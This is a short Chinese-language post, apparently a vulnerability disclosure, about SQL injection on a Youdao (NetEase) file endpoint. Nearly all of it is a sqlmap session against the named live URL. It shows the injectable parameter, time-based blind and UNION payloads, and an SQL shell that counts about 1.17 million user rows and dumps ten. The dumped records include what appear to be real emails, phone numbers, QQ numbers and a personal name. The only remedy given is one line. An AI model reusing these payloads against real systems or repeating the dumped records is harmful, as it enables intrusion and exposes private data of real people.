网易某站点SQL注入影响百万用户信息

  • 2022-04-07 19:34:30
$ python sqlmap.py -u "https://f.youdao.com/file.do?method=getMajorName&subject=undefined*" --sql-shell
         _
 ___ ___| |_____ ___ ___  {1.0.3.9#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:19:31

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[12:19:33] [INFO] resuming back-end DBMS 'mysql'
[12:19:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' AND (SELECT * FROM (SELECT(SLEEP(5)))wyCV) AND 'UlJS'='UlJS

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' UNION ALL SELECT NULL,CONCAT(0x716a766a71,0x686f634c42577a794d7447684b6b796e51566255644e6f58714b6e527568574b4d786f536a50426d,0x7170717a71),NULL,NULL-- -
---
[12:19:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[12:19:33] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from user_online
[12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online'
[12:20:00] [WARNING] reflective value(s) found and filtering out
select count(*) from user_online:    '1171117'
sql-shell> select * from user_online limit 10
[12:20:49] [INFO] fetching SQL SELECT statement query output: 'select * from user_online limit 10'
[12:20:49] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[12:20:49] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[12:20:49] [INFO] fetching current database
[12:20:49] [INFO] fetching columns for table 'user_online' in database 'atranslate'
[12:20:49] [INFO] the query with expanded column name(s) is: SELECT amount, createTime, email, id, info, trialAmount, username FROM user_online LIMIT 10
[12:20:49] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
[12:20:49] [INFO] retrieved: "0","1421038640911","[email protected]","-9223371666268699366","{\\"phone\\":\\"13849737026\\...
[12:20:49] [INFO] retrieved: "0","1441078075986"," ","-9223365685474998611","{\\"vendor\\":\\"write\\"}","0","kuang.xiaoyan@...
[12:20:50] [INFO] retrieved: "0","1456906495294"," ","-9223339392571530192","{\\"vendor\\":\\"read\\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1420706540215"," ","-9223331508831089524","{\\"vendor\\":\\"write\\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1458184084774"," ","-9223323061235546606","{\\"vendor\\":\\"weixinapp\\"}","0","opWGrjrDDK...
[12:20:50] [INFO] retrieved: "0","1422687949837"," ","-9223299177461494054","{\\"vendor\\":\\"write\\"}","0","carrie_chicos@...
[12:20:50] [INFO] retrieved: "0","1433299378884"," ","-9223294631254944376","{\\"vendor\\":\\"write\\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1433410028488","[email protected]","-9223283068763516084","{\\"phone\\":\\"13924952418\\",\\...
[12:20:50] [INFO] retrieved: "0","1457073582194"," ","-9223281766783387951","{\\"vendor\\":\\"write\\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1440489549781"," ","-9223261311899849978","{\\"vendor\\":\\"write\\"}","0","[email protected]"
select * from user_online limit 10 [10]:
[*] 0, 1421038640911, [email protected], -9223371666268699366, {\"phone\":\"13849737026\",\"bill\":null,\"nickname\":\"Bonnie\",\"vendor\":\"fanyiinput\",\"name\":\"陈秀\",\"qq\":\"792684076\"}, 0, qq_F516AC4A2C032277B0BECE2E5FA8EEF0
[*] 0, 1441078075986,  , -9223365685474998611, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1456906495294,  , -9223339392571530192, {\"vendor\":\"read\"}, 0, [email protected]
[*] 0, 1420706540215,  , -9223331508831089524, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1458184084774,  , -9223323061235546606, {\"vendor\":\"weixinapp\"}, 0, opWGrjrDDKLQ7kKG4-4KGEBlKsYs
[*] 0, 1422687949837,  , -9223299177461494054, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433299378884,  , -9223294631254944376, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433410028488, [email protected], -9223283068763516084, {\"phone\":\"13924952418\",\"nickname\":\"☆心B\\\/tp钟\",\"vendor\":\"connect.qq.com\"}, 0, qq_E58B42699858FC01548B79B25230D4A2
[*] 0, 1457073582194,  , -9223281766783387951, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1440489549781,  , -9223261311899849978, {\"vendor\":\"write\"}, 0, [email protected]
sql-shell> select count(*) from user_online
[12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online'
[12:20:00] [WARNING] reflective value(s) found and filtering out
select count(*) from user_online:    '1171117'

1171117位用户的数据,还挺顺口的。

解决方案:

过滤,转义,加waf。

猜你喜欢